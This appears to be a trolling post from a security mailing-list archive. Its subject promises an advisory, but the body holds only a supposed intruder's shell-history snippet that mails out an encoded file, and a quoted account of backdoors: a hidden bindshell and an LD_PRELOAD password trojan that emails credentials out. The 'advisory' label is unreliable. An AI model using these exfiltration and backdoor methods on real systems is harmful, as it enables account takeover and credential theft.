Open Source and information security mailing list archives
From: slotto at (Slotto Corleone)
Subject: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

-- .bash_history from the box
cd GOBBLES_dvdman
uuencode haxorpc.jpg yo | mail

Please return dvdman's copyright material before continuing any
further communication. Thank you.

On Fri, 30 Apr 2004 00:32:37 -0400, Richard Johnson <> wrote:
> On Thu, Apr 29, 2004 at 03:56:50PM -0700, Slotto Corleone wrote:
> > - rave gets his account backdoored on kokanin's box. He finds the
> > obviously placed bindshell stashed as ~/bin/zsh. He laughs and says
> > the backdoor was lame. Well he obviously missed the getpass()
> > LD_PRELOAD, ssh, and passwd all on his local account mailing all his
> > new passwords out. Oh, and he left an exploit (servu.c) in his
> > directory for the version of servu ftpd he was running on his home
> > windows machine. Oops.
> Care to share any additional information on how this described FreeBSD
> kernel bug can be exploited?
> We are ready to pay top dollar for this information, to whoever comes
> forward with it.
> --
> Richard Johnson, CISSP
> Senior Security Researcher
> Get paid for security stuff!!!!!!
